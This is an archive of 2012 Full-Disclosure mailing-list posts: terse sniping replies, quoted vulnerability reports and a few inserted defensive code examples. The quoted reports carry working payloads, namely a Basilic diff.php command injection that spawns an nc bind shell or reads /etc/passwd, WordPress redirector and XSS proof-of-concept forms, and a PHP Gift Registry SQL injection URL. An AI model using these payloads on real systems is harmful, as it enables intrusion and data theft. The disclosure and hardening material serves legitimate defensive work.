Thank you for confirming that, and providing an even sup3r c00ler POC.
I have always wondered how nc works, and combined with system, it
seems it makes a super exciting vulnerability.

On Fri, Jul 6, 2012 at 5:32 PM, larry Cashdollar  wrote:
> verified, http://artis.imag.fr/Software/Basilic/
>
> http://127.0.0.1/basilic/Config/diff.php?file=%26nc%20-ltp%20-e%20/bin/bash&new=1&old=2
>
> for an interactive shell on port .  Neat.
>
> line 39 of diff.php is
>
> system("diff ../$_GET[old]/$_GET[file] $_GET[new]/$_GET[file] | sed
> s%\"<\"%\"\<\"%g | sed s%\">\"%\"\>\"%g");
>
>
> On Jun 30, 2012, at 01:45 PM, m.razavi...@gmail.com wrote:
>
> Hi
> Dear Sir
>
> Basilic is an Automated Bibliography Server for Research Publications
> Diffusion that use by many research center.
> there is a RCE bug in basilic/Config/diff.php s could allow an attacker to
> run system command in server.
> sample:
> http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2
>
> Regards
> M.Razavi
>
>
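The `system()` call quoted from line 39 of diff.php builds a shell command line out of `$_GET` values, which is why a `%26` (`&`) in `file` starts a second command. A hardened equivalent as an added PHP example, not Basilic's own code or its actual fix: each parameter is limited to a single safe path component, `diff` is started without a shell, and the output is HTML-encoded in PHP instead of through `sed`. The function names and the directory layout are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not Basilic's code). Function names and the version-directory
// layout are assumptions made for illustration.

/** Accepts one path component only; throws on anything else. */
function safe_component(string $value): string
{
    // First character: letter, digit or underscore (so ".", ".." and option-like
    // "-x" values are refused). Rest: letters, digits, dot, underscore, hyphen.
    // Slashes, spaces and shell metacharacters such as & ; | ` $ never match.
    if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9._-]{0,127}\z/', $value)) {
        throw new InvalidArgumentException('invalid path component');
    }
    return $value;
}

/** Returns the HTML-encoded diff of $file between two version directories. */
function diff_versions(string $baseDir, string $old, string $new, string $file): string
{
    $oldPath = $baseDir . '/' . safe_component($old) . '/' . safe_component($file);
    $newPath = $baseDir . '/' . safe_component($new) . '/' . safe_component($file);

    // The array form of proc_open (PHP 7.4+) executes diff directly, so no
    // shell ever parses the arguments. "--" ends diff's option parsing.
    $cmd  = ['diff', '--', $oldPath, $newPath];
    $spec = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start diff');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc); // diff exits with 1 when the files differ; that is not an error

    // Encode for HTML output here rather than piping through sed.
    return htmlspecialchars((string) $out, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Stand-alone check (php thisfile.php) on constructed sample files.
if (PHP_SAPI === 'cli') {
    $base = sys_get_temp_dir() . '/diff_demo_' . getmypid();
    foreach (['1' => "title = A\n", '2' => "title = B\n"] as $version => $body) {
        mkdir("$base/$version", 0700, true);
        file_put_contents("$base/$version/conf.txt", $body);
    }

    // Normal request: prints the encoded diff of the two sample files.
    echo diff_versions($base, '2', '1', 'conf.txt');

    // The decoded `file` value from the report above is refused before any
    // process is started.
    try {
        diff_versions($base, '2', '1', '&cat /etc/passwd');
        echo "accepted (unexpected)\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```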


Re: [Full-disclosure] [oss-security] RE: GIMP FIT File Format DoS

2012-07-02 Thread Benji
hey! let them having something to add to CV! Stop be fun police!
Everyone know security isnt actually about security, just make CV look
super cool.

On Fri, Jun 29, 2012 at 10:45 PM, Morris, Patrick  wrote:
>
>> -Original Message-
>> From: Joseph Sheridan [mailto:j...@reactionis.com]
>> Sent: Friday, June 29, 2012 3:56 AM
>> To: 'full-disclosure'; 'bugtraq'; secal...@securityreason.com;
>> b...@securitytracker.com; 'vuln'; v...@security.nnov.ru;
>> n...@securiteam.com; moderat...@osvdb.org;
>> submissi...@packetstormsecurity.org; sub...@cxsecurity.com; oss-
>> secur...@lists.openwall.com; b...@securitytracker.com
>> Subject: GIMP FIT File Format DoS
>>
>> Summary
>> ===
>>
>> There is a file handling DoS in GIMP (the GNU Image Manipulation
>> Program) for
>> the 'fit' file format affecting all versions (Windows and Linux) up to
>> and
>> including 2.8.0. A file in the fit format with a malformed 'XTENSION'
>> header
>> will cause a crash in the GIMP program.
>
> Is a crash in a single-user program really a security vulnerability? I could
> understand if there was evidence that this could lead to privilege escalation
> or other actual security issue, but this sounds like a garden-variety crash
> bug to me.



Re: [Full-disclosure] WordPress Authenticated File Upload Authorisation Bypass

2012-06-21 Thread Benji
I hear Trustwave are reporting similar issues, like the fact you can
specify remote mysql servers in new installations, amazing right? Do
you work for them?

Btw, with phpmyadmin you can injection sql commands !!!

On Fri, Jun 22, 2012 at 12:00 AM, Denis Andzakovic
 wrote:
>
> Say a wordpress install has been configured as such that the user running
> the web server does not have write access to wp-content/plugins. A wordpress
> admin then attempts to upload a plugin, they get prompted for ftp
> credentials to be able to install. Wordpress does this to ensure everything
> has the right permissions.
> (http://codex.wordpress.org/Managing_Plugins#Installing_Plugins)
>
> *Before* getting prompted for these creds, the uploaded file is staged into
> the uploads directory, which lives under the web-root. The issue here is
> that files, regardless of installation status and type, are thrown into the
> uploads directory.
>
> I see one potential scenario as; a sysadmin would lock down the file
> permissions on the wp-content/plugins directory to stop Wordpress
> users/admins from uploading potentially malicious code. Admittedly, config
> define( 'DISALLOW_FILE_MODS', TRUE), is the correct way of doing this,
> however that doesn't make the former scenario completely implausible.
>
> Regards,
> Denis
>
> On 22/06/12 2:42 AM, Greg Knaddison wrote:
>
>> On Wed, Jun 20, 2012 at 8:04 PM, Denis Andzakovic
>> > > wrote:
>>
>> Exploitation of this vulnerability requires a malicious user with
>> access to the admin panel to use the
>> "/wp-admin/plugin-install.php?tab=upload" page to upload a malicious
>> file.
>>
>>
>> That tool is meant to allow an admin to upload arbitrary php plugins. You
>> can argue that this feature is insecure by design, but there are two
>> solutions from the WordPress perspective:
>>
>> 1) "Don't grant malicious users the permission to install plugins."
>> 2) If you don't want this feature on your site at all, this feature can be
>> disabled in the config define( 'DISALLOW_FILE_MODS', TRUE);
>>
>> By the way, two more "vulnerabilities" the theme installer has this same
>> issue and the upgrade tool could also be abused if you can poison the DNS of
>> the server.
>>
>> Regards,
>> Greg
>


Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-10 Thread Benji
You're the one that suggested a real suggestion would be to use an
'alternate os'.

Live in a cave please?

On Sun, Jun 10, 2012 at 10:56 PM, Laurelai  wrote:

>  On 6/10/12 5:54 PM, Benji wrote:
>
> Which antisec kids? Unfortunately due to some people being utterly deluded,
> such as yourself, throwing that word around it's rather ambiguous now.
>
> On Sun, Jun 10, 2012 at 10:49 PM, Laurelai  wrote:
>
>>   On 6/10/12 5:09 PM, Thor (Hammer of God) wrote:
>>
>>  OK, I’ll bite this one time.  I assert you are blatantly lying about
>> military service.  How about tell me your service dates?  Surely you can’t
>> consider that any sort of privacy breach.
>>
>>
>>
>> This is an easy way for us to be done with the whole thing.  Part of your
>> diatribe is based on your “right” to bitch because of your military
>> service.  I, again, assert that is complete fabrication.  As someone who
>> actually HAS done work for the government I know (as you should) that your
>> military service records are actually public record.  I don’t need your
>> service dates, but it will help.  All I need do is fax over form SF-180,
>> and they’ll verify your service.
>>
>>
>>
>> If you really did serve, I’ll apologize publically.  If you didn’t (or
>> don’t provide the information) then we’ll all know you are just a lying
>> nutjob and we can ignore you from now on.  Is that fair enough?
>>
>>
>>
>> *Timothy “Thor”  Mullen*
>>
>> *www.hammerofgod.com*
>>
>> *Thor’s Microsoft Security 
>> Bible<http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727>
>> *
>>
>>
>>
>>
>>
>> *From:* full-disclosure-boun...@lists.grok.org.uk [
>> mailto:full-disclosure-boun...@lists.grok.org.uk]
>> *On Behalf Of *Laurelai
>> *Sent:* Sunday, June 10, 2012 2:00 PM
>> *To:* full-disclosure@lists.grok.org.uk
>> *Subject:* Re: [Full-disclosure] Obama Order Sped Up Wave of
>> Cyberattacks Against Iran
>>
>>
>>
>> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote:
>>
>> And not capitalizing "Army" when you claim to have spent 10 years of your
>> life in service does precisely the same thing.
>>
>>
>> On Jun 10, 2012, at 3:31 AM, "Laurelai"  wrote:
>>
>>
>>
>>
>>
>>  I dont listen to either. And sorry to burst your bubble but I did serve
>> 10 years in the army.
>>
>>
>>
>> Next I imagine you will insult my gender identity or something equally
>> silly. For the record you should capitalize the first word of each sentence
>> and put a punctuation mark at the end, not doing this just makes you look
>> uneducated and ensures people do not take you seriously.
>>
>> Except i don't like the government.
>>
>>  And i hope those antisec kids own the lot of your frauds, really i ask
>> a simple question on how to avoid state sponsored malware that runs
>> exclusively on windows platforms and not a single one of you said anything
>> about using an alternate OS, some of you insisted in fact we should just
>> lie down and take it. You aren't security experts you are scam artists.
>> Makes me wonder if you are paid to act this way or if you all really just
>> didnt consider it. Either answer is pretty chilling.
>>
>>
>
>  None of you could give the obvious solution to my question and I'm the
> deluded one, right. Let me know when the blow wears off and you want to
> talk for real ok?
>

Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-10 Thread Benji
Which antisec kids? Unfortunately due to some people being utterly deluded,
such as yourself, throwing that word around it's rather ambiguous now.

On Sun, Jun 10, 2012 at 10:49 PM, Laurelai  wrote:

>  On 6/10/12 5:09 PM, Thor (Hammer of God) wrote:
>
>  OK, I’ll bite this one time.  I assert you are blatantly lying about
> military service.  How about tell me your service dates?  Surely you can’t
> consider that any sort of privacy breach.  
>
> This is an easy way for us to be done with the whole thing.  Part of your
> diatribe is based on your “right” to bitch because of your military
> service.  I, again, assert that is complete fabrication.  As someone who
> actually HAS done work for the government I know (as you should) that your
> military service records are actually public record.  I don’t need your
> service dates, but it will help.  All I need do is fax over form SF-180,
> and they’ll verify your service.
>
> If you really did serve, I’ll apologize publically.  If you didn’t (or
> don’t provide the information) then we’ll all know you are just a lying
> nutjob and we can ignore you from now on.  Is that fair enough?
>
> *Timothy “Thor”  Mullen*
>
> *www.hammerofgod.com*
>
> *Thor’s Microsoft Security 
> Bible
> *
>
> *From:* full-disclosure-boun...@lists.grok.org.uk [
> mailto:full-disclosure-boun...@lists.grok.org.uk]
> *On Behalf Of *Laurelai
> *Sent:* Sunday, June 10, 2012 2:00 PM
> *To:* full-disclosure@lists.grok.org.uk
> *Subject:* Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
> Against Iran
>
> On 6/10/12 12:52 PM, Thor (Hammer of God) wrote: 
>
> And not capitalizing "Army" when you claim to have spent 10 years of your
> life in service does precisely the same thing. 
>
>
> On Jun 10, 2012, at 3:31 AM, "Laurelai"  wrote:
>
>  I dont listen to either. And sorry to burst your bubble but I did serve
> 10 years in the army.
>
> Next I imagine you will insult my gender identity or something equally
> silly. For the record you should capitalize the first word of each sentence
> and put a punctuation mark at the end, not doing this just makes you look
> uneducated and ensures people do not take you seriously.
>
> Except i don't like the government.
>
> And i hope those antisec kids own the lot of your frauds, really i ask a
> simple question on how to avoid state sponsored malware that runs
> exclusively on windows platforms and not a single one of you said anything
> about using an alternate OS, some of you insisted in fact we should just
> lie down and take it. You aren't security experts you are scam artists.
> Makes me wonder if you are paid to act this way or if you all really just
> didnt consider it. Either answer is pretty chilling.
>

Re: [Full-disclosure] [OT] New online service to make XSSs easier

2012-05-07 Thread Benji
People using this service definitely wont be up to anything clever or
interesting, so it's barely a concern.

I mean really, this is useful?

On Mon, May 7, 2012 at 4:17 PM, Gage Bystrom  wrote:
> Anyone visiting a compromised site can get the hash, meaning anyone
> who is looking for it can find it and lets any random person(assuming
> stored) visiting to be able to grab all the cookie values.
>
> That's not even my personal concern. My concern is why should I trust
> the owner? Whether you are a black hat, white hat, or myriad of other
> assorted hats  you would be allowing sensitive information to sit on
> this guy's server. How do we know he isn't silently making a copy of
> all the data for his own ends? Simply we don't.
>
> On Mon, May 7, 2012 at 6:03 AM,   wrote:
>> On Mon, 07 May 2012 02:27:33 +0530, karniv0re said:
>>
>>> And this is anonymous.. How??
>>
>> Haven't checked, but if you set up the userid/password via Tor, should
>> be pretty anonymous.
>>
>>> http://www.getmycookie.com/view.m3?hash=
>>
>> And you get somebody else's hash value, how?
>>
>>


Re: [Full-disclosure] IAA, Redirector and XSS vulnerabilities in WordPress

2012-05-05 Thread Benji
Wow, you're like the Jehovah's Witnesses of the internet.

Stop with the childish bitching and grow up. Last time I checked
intern0t was also a script kid breeding ground.

On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories
 wrote:
> Hi List,
>
> To stop MustLive's desperate act of trying to get visitors (and more
> backlinks) to his website, I have for those that doesn't want to go to
> there, just to see the PoC's but actually read them on this mailing list
> like almost _every other_ Proof of Concept / exploit, made them available
> below.
>
> Contents of Wordpress Redirector:
> 
> 
> WordPress Redirector exploit (lol?) (C) 2012 MustLive.
> [removed]
> 
> 
> 
> http://site/wp-comments-post.php"; method="post">
> 
> 
> 
> 
> http://awebsite.tld"; />
> 
> 
> 
> --
>
> Contents of Wordpress XSS:
> 
> 
> WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]
> 
> 
> 
> http://site/wp-comments-post.php"; method="post">
> 
> 
> 
> 
>  value="javascript:alert%28document.cookie%29//" />
> 
> 
> 
> --
>
> I don't really have any comments about these "exploits".
>
>
>
> Best regards,
> Nemesis 3.0
>
>
> On Sat, 5 May 2012 16:01:53 +0300, "MustLive"
> 
> wrote:
>> Hello list!
>>
>> I want to warn you about security vulnerabilities in WordPress.
>>
>> These are Insufficient Anti-automation, Redirector and Cross-Site Scripting
>> vulnerabilities.
>>
>> -
>> Affected products:
>> -
>>
>> Vulnerable are WordPress 2.0 - 3.3.1.
>>
>> --
>> Details:
>> --
>>
>> Already from WP 2.0 there are Insufficient Anti-automation, Redirector and
>> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just when
>> begun using WP in 2006. If the developers fixed vulnerabilities in previous
>> two redirectors in WP 2.3, then these vulnerabilities were not fixed even in
>> WP 3.3.1
>>
>> IAA (WASC-21):
>>
>> Lack of captcha in comment form allows to conduct automated attacks. The
>> developers still haven't put captcha in WP comments form (from the first
>> version of engine), which besides IAA attacks, also allowed to conduct
>> Redirector and XSS attacks.
>>
>> By default in WordPress the premoderation is turned on, and also there is
>> built-in anti-spam filter. But if 10 years ago the premoderation would be
>> enough, then long ago this mechanism couldn't be considered as sufficient
>> protection against spam, and anti-spam filter had efficiency less than 1% -
>> only few from spam messages he marked as spam. And also these mechanisms
>> don't protect against below-mentioned attacks. Also plugin Akismet is
>> bundled with WP, which is "captcha-less" protection against spam. But by
>> default it's turned off and comparing with captcha it's considered as less
>> efficient and also doesn't protect against below-mentioned attacks.
>>
>> Redirector (URL Redirector Abuse) (WASC-38):
>>
>> Exploit:
>>
>> [Removed]
>>
>> XSS (WASC-08):
>>
>> Exploit:
>>
>> [Removed]
>>
>> XSS attack is possible on different browsers, but it's harder to conduct
>> than in case of previous two redirectors (via data URI). At IIS web servers
>> the redirect is going via Refresh header, and at other web servers - via
>> Location header.
>>
>> Due to nuances of work of this script (filtering of important symbols and
>> adding of anchor), for execution of JS code it's needed to use tricky bypass
>> methods. This complexity exists as with javascript URI, as with combo
>> variant javascript URI + data URI.
>>
>> Reliable captcha protects against IAA, Redirector and XSS vulnerabilities.
>>
>> 
>> Timeline:
>> 
>>
>> 2012.04.26 - disclosed at my site
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>>
>>
>>


Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji
except it was rather obvious why.

On Wed, Apr 25, 2012 at 10:27 AM, Laurelai  wrote:
> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu wrote:
>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>> if you read his "advisories" and "0-days" you know: It's not a joke...
>>> I always thought it was misunderstood performance art...
>>
>>
>> this one appears to be true:
>> http://seclists.org/fulldisclosure/2011/Jul/312
>> Full disclosure is arrest of Sabu
>> (check the date)
>>
> And thats when sabu was MIA from twitter and everyone knew about that,
> nobody really knew why though.
>


Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji
You should be paranoid if someone could construe what you're doing as illegal.

On Wed, Apr 25, 2012 at 11:07 AM, Laurelai  wrote:
> On 4/25/12 4:59 AM, Benji wrote:
>>
>> And choosing to believe any of the other reasons when you think you're
>> an '1337 hacker' and are involved in that world, is a personality
>> problem, end of.
>>
>> On Wed, Apr 25, 2012 at 10:58 AM, Laurelai  wrote:
>>>
>>> On 4/25/12 4:54 AM, Benji wrote:
>>>>
>>>> No, with open eyes sight. If you chose not to believe the obvious at
>>>> the time, that is your own mistake and proof that you (general you,
>>>> not you specifically) were more interested in being part of the crowd
>>>> than thinking.
>>>>
>>>>
>>>> On Wed, Apr 25, 2012 at 10:52 AM, Laurelai
>>>>  wrote:
>>>>>
>>>>> On 4/25/12 4:48 AM, Benji wrote:
>>>>>>
>>>>>> except it was rather obvious why.
>>>>>>
>>>>>> On Wed, Apr 25, 2012 at 10:27 AM, Laurelai
>>>>>>  wrote:
>>>>>>>
>>>>>>> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>>>>>>>>
>>>>>>>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu
>>>>>>>> wrote:
>>>>>>>>>
>>>>>>>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>>>>>>>>
>>>>>>>>>> if you read his "advisories" and "0-days" you know: It's not a
>>>>>>>>>> joke...
>>>>>>>>>
>>>>>>>>> I always thought it was misunderstood performance art...
>>>>>>>>
>>>>>>>>
>>>>>>>> this one appears to be true:
>>>>>>>> http://seclists.org/fulldisclosure/2011/Jul/312
>>>>>>>> Full disclosure is arrest of Sabu
>>>>>>>> (check the date)
>>>>>>>>
>>>>>>>
>>>>>>> And thats when sabu was MIA from twitter and everyone knew about
>>>>>>> that,
>>>>>>> nobody really knew why though.
>>>>>>>
>>>>>
>>>>> In hindsight yes.
>>>
>>> There are any number of reasons why someone, even sabu could have stopped
>>> tweeting then started back up again. It just turned out that this was the
>>> case this time.
>
> I prefer not making assumptions about things i dont have any information on.
>  Sorry you consider that a personality problem :p



Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji
And choosing to believe any of the other reasons when you think you're
an '1337 hacker' and are involved in that world, is a personality
problem, end of.

On Wed, Apr 25, 2012 at 10:58 AM, Laurelai  wrote:
> On 4/25/12 4:54 AM, Benji wrote:
>>
>> No, with open eyes sight. If you chose not to believe the obvious at
>> the time, that is your own mistake and proof that you (general you,
>> not you specifically) were more interested in being part of the crowd
>> than thinking.
>>
>>
>> On Wed, Apr 25, 2012 at 10:52 AM, Laurelai  wrote:
>>>
>>> On 4/25/12 4:48 AM, Benji wrote:
>>>>
>>>> except it was rather obvious why.
>>>>
>>>> On Wed, Apr 25, 2012 at 10:27 AM, Laurelai
>>>>  wrote:
>>>>>
>>>>> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>>>>>>
>>>>>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu
>>>>>> wrote:
>>>>>>>
>>>>>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>>>>>>
>>>>>>>> if you read his "advisories" and "0-days" you know: It's not a
>>>>>>>> joke...
>>>>>>>
>>>>>>> I always thought it was misunderstood performance art...
>>>>>>
>>>>>>
>>>>>> this one appears to be true:
>>>>>> http://seclists.org/fulldisclosure/2011/Jul/312
>>>>>> Full disclosure is arrest of Sabu
>>>>>> (check the date)
>>>>>>
>>>>>
>>>>> And thats when sabu was MIA from twitter and everyone knew about that,
>>>>> nobody really knew why though.
>>>>>
>>>
>>> In hindsight yes.
>
> There are any number of reasons why someone, even sabu could have stopped
> tweeting then started back up again. It just turned out that this was the
> case this time.



Re: [Full-disclosure] Vulnerability in Gentoo hardened

2012-04-25 Thread Benji
No, with open eyes sight. If you chose not to believe the obvious at
the time, that is your own mistake and proof that you (general you,
not you specifically) were more interested in being part of the crowd
than thinking.


On Wed, Apr 25, 2012 at 10:52 AM, Laurelai  wrote:
> On 4/25/12 4:48 AM, Benji wrote:
>>
>> except it was rather obvious why.
>>
>> On Wed, Apr 25, 2012 at 10:27 AM, Laurelai  wrote:
>>>
>>> On 4/25/12 3:56 AM, Georgi Guninski wrote:
>>>>
>>>> On Tue, Apr 24, 2012 at 12:15:26PM -0400, valdis.kletni...@vt.edu wrote:
>>>>>
>>>>> On Tue, 24 Apr 2012 17:36:55 +0200, Milan Berger said:
>>>>>>
>>>>>> if you read his "advisories" and "0-days" you know: It's not a joke...
>>>>>
>>>>> I always thought it was misunderstood performance art...
>>>>
>>>>
>>>> this one appears to be true:
>>>> http://seclists.org/fulldisclosure/2011/Jul/312
>>>> Full disclosure is arrest of Sabu
>>>> (check the date)
>>>>
>>>
>>> And thats when sabu was MIA from twitter and everyone knew about that,
>>> nobody really knew why though.
>>>
>
> In hindsight yes.



Re: [Full-disclosure] Erronous post concerning Backtrack 5 R2 0day

2012-04-12 Thread Benji
in soviet russia, lesson teaches you. in west, no lesson learnt by anyone.

On Thu, Apr 12, 2012 at 9:51 PM, Adam Behnke  wrote:
> Yesterday I made a post concerning a 0day advisory in Backtrack 5 R2:
> http://seclists.org/fulldisclosure/2012/Apr/123
>
> The posting was incorrect, the vulnerability was NOT in Backtrack but in
> wicd, no Backtrack contributed code is vulnerable. When we tweeted and
> emailed to mailing lists the notifications of this vulnerability, we
> incorrectly shortened the title and called it "Backtrack 5 R2 priv
> escalation 0day ", which is misleading and could lead people to believe the
> bug was actually in Backtrack. The bug has always resided in wicd and not in
> any Backtrack team written code. We apologize for the confusion to the
> Backtrack team and any other persons affected by this error. We feel the
> Backtrack distro is a great piece of software and wish muts and the rest of
> the team the best.
>
>
>


Re: [Full-disclosure] Compromised VPN provider out there?

2012-04-10 Thread Benji
> How come I'm not surprised that public proxies are being abused for brute
> force attacks?

You're just that far ahead of the curve?

On Tue, Apr 10, 2012 at 5:17 AM,   wrote:
>> Hi
>>
>> To any security-aware VPN providers out there reading this:
>>
>> More than 800 hosts (mostly from Asia) started hitting TorVPN.com's
>> webserver on HTTPS with login requests.
>>
>> Before blocking them all (and adding them to the proxy list section of my
>> site after testing, heh)
>> I decided to temporarily log the attempted usernames and passwords for a
>> few seconds to see what the deal was.
>>
>> The usernames and passwords do not seem to be from dictionaries, more like
>> someone got a hold of plaintext
>> userinfo from somewhere and figured enough of them could be valid for
>> TorVPN.com to make it worth
>> the time to write a script and start bruteforcing (and monitor results,
>> because when I changed the login
>> URL, they updated their script in less than 5 minutes).
>>
>> I believe the most likely reason for an attacker to try check for password
>> re-use on my site is if their
>> accounts are from another VPN provider's database - which is why I am
>> writing this.
>>
>> Below you will find a list of usernames (not posting the passwords) that
>> were logged in those few seconds.
>> (None of them are actual real users on TorVPN, they are not part of any
>> public list that can be found with Google)
>>
>>   - vlai1214
>>   - BHGboat
>>   - haines
>>   - Mod95TZc
>>   - JJOM54
>>   - johnnieak
>>   - hair7
>>   - hair18
>>   - flipperke
>>   - outhcent
>>   - haipas
>>   - hainline
>>   - anxdpphh2334
>>   - rgcBCN
>>   - Pretty26
>>   - hair11
>>   - hairaP
>>   - cyrren
>>   - tomba73
>>   - mikemaynard25a
>>   - jamesmorrow
>>   - lending2
>>   - laynec
>>   - willthekiller
>>   - chrisn
>>   - chulony79
>>   - firefox
>>
>> If someone-who-isn't-me obtains similar info from an attack, manages to
>> log in to another VPN provider
>> with the logged accounts, sends me an e-mail about this success, I will
>> post the results.
>>
>> If anyone has already experienced a similar password bruteforce on their
>> VPN-website, do not hesitate to post details.
>>
>> Whoever hammered my server, I'd like to thank you for possibly helping to
>> uncover an ownage, as well as for helping me
>> re-fill the list of proxies on my site with working ones.
>>
>> Kind regards,
>> https://torvpn.com/
>>
>> ps: a couple of IPs with the most attempts
>>
>>
>>
>
> Just due to curiosity, I picked up the first proxy (189.127.120.253) and
> ran it against http://nixapi.com/ip-reputation-lookup. The result was
> 'HTTP L3 (Transparent) proxy 189.127.120.253:3128 - Verified 03:49:38
> ago.'
>
> How come I'm not surprised that public proxies are being abused for brute
> force attacks? About a year ago, I set up a public proxy for testing
> purposes; after ~two days of uptime, from what I can remember:
>
> Over 500 simultaneous connections all the time
> I think there was only 0.1% human users, the rest were abuse bots/scripts
> Bandwidth used constantly: 15-50Mbps/second (I remember capping it to
> 50Mbps to prevent network lag issues to other services)
>
> There were several hundred thousand connections in a very short time ...
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
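
The pattern described in the post above (attempted usernames that are not real accounts, spread over many proxy addresses) can be told apart from ordinary password guessing in the login log. This is an added example, not code from the original post; the record layout, thresholds and sample data are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

# Constructed sample data: (epoch_seconds, source_ip, username, success).
# Addresses come from the RFC 5737 documentation ranges; usernames are invented.
KNOWN_USERS = {"alice", "bob", "carol"}


def make_sample():
    attempts = []
    # One leaked list replayed through three proxies: many usernames, one try each.
    for i in range(60):
        ip = "198.51.100.%d" % (1 + i % 3)
        attempts.append((1000 + i // 10, ip, "leaked_user_%02d" % (i % 40), False))
    # Ordinary traffic: real users, one mistyped password.
    attempts += [(1001, "203.0.113.7", "alice", False),
                 (1002, "203.0.113.7", "alice", True),
                 (1003, "203.0.113.9", "bob", True)]
    # Password guessing against a single existing account from one address.
    attempts += [(1004 + n, "192.0.2.50", "carol", False) for n in range(25)]
    return attempts


def profile_sources(attempts, known_users):
    """Aggregate per-source counters from the raw attempt records."""
    stats = defaultdict(lambda: {"total": 0, "failed": 0, "unknown": 0,
                                 "users": Counter()})
    for _ts, ip, user, ok in attempts:
        s = stats[ip]
        s["total"] += 1
        s["failed"] += 0 if ok else 1
        s["unknown"] += 0 if user in known_users else 1
        s["users"][user] += 1
    return stats


def classify_source(s, min_attempts=10):
    """Label one source. All thresholds are illustrative assumptions."""
    if s["total"] < min_attempts or s["failed"] / s["total"] < 0.9:
        return "normal"
    distinct = len(s["users"])
    tries_per_user = s["total"] / distinct
    unknown_ratio = s["unknown"] / s["total"]
    # Replay of a list stolen elsewhere: many names, few tries per name, and
    # most names are not accounts on this site at all.
    if distinct >= 10 and tries_per_user <= 3 and unknown_ratio >= 0.8:
        return "list-replay"
    # Dictionary guessing: many tries against one or two names.
    if distinct <= 2:
        return "single-account-guessing"
    return "suspicious"


def detect_campaign(attempts, known_users, min_sources=3):
    """Correlate sources: the same list arriving through several proxies."""
    stats = profile_sources(attempts, known_users)
    verdicts = {ip: classify_source(s) for ip, s in stats.items()}
    replay_ips = sorted(ip for ip, v in verdicts.items() if v == "list-replay")
    seen_by = defaultdict(set)
    for _ts, ip, user, _ok in attempts:
        if ip in replay_ips:
            seen_by[user].add(ip)
    # Names tried from more than one address tie the sources to one list.
    shared = sum(1 for ips in seen_by.values() if len(ips) > 1)
    return {
        "verdicts": verdicts,
        "replay_ips": replay_ips,
        "shared_usernames": shared,
        "campaign": len(replay_ips) >= min_sources,
    }


if __name__ == "__main__":
    result = detect_campaign(make_sample(), KNOWN_USERS)
    for ip, verdict in sorted(result["verdicts"].items()):
        print(ip, verdict)
    print("distributed list replay:", result["campaign"],
          "shared usernames:", result["shared_usernames"])
```

Per-address rate limits alone miss this traffic because each proxy stays individually modest; the unknown-username ratio and the names shared across sources are what link the addresses together.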


Re: [Full-disclosure] Cookie based SQL Injection

2012-03-06 Thread Benji
Yes, because this is incredibly new.

On Tue, Mar 6, 2012 at 8:54 PM, Zach C.  wrote:

> Even so, watch all the advisories pour in now for "cookie-based SQL
> injection." :/
> On Mar 6, 2012 12:44 PM,  wrote:
>
>> On Tue, 06 Mar 2012 14:28:51 CST, Adam Behnke said:
>> > Unlike other parameters, cookies are not supposed to be handled by
>> > users.
>>
>> Any site that designs its security model around that concept will get what
>> it richly deserves.

Re: [Full-disclosure] PHP Gift Registry 1.5.5 SQL Injection

2012-02-24 Thread Benji
plz to tell me how long you left cluster fuzzer running to find this hole
size of a pin?

On Fri, Feb 24, 2012 at 3:08 PM, Thomas Richards  wrote:

> # Exploit Title: PHP Gift Registry 1.5.5 SQL Injection
> # Date: 02/22/12
> # Author: G13
> # Software Link: https://sourceforge.net/projects/phpgiftreg/
> # Version: 1.5.5
> # Category: webapps (php)
> #
>
> # Vulnerability #
>
> The userid parameter in the users.php file is vulnerable to SQL Injection.
>
> A user must be signed in to exploit this.
>
> # Vendor Notification #
>
> 02/22/12 - Vendor Notified
> 02/24/12 - No response, disclosure
>
> # Exploit #
>
> http://localhost/phpgiftreg/users.php?action=edit&userid=[SQLi]

Re: [Full-disclosure] Analysis of the "r00t 4 LFI Toolkit"

2012-02-20 Thread Benji
A priv8 php shell, funniest thing I've ever heard on this list.

On Mon, Feb 20, 2012 at 1:37 PM, Gage Bystrom wrote:

> Uhh no, you misread what he said. He's saying he's seen that code in a few
> php shells that were supposedly meant to be private but the authors were
> miserable failures and he found the code anyways, not that he wrote it.
> On Feb 20, 2012 12:36 AM, "Manu"  wrote:
>
>> But you saw it in a few """priv8""" php shells? And you say that is your
>> code as 'r00t 4 LFI toolkit' ? Pathetic
>>
>>
>> 2012/2/19 InterN0T Advisories 
>>
>>> Thank you for the response, I didn't know it was included in the Weevely
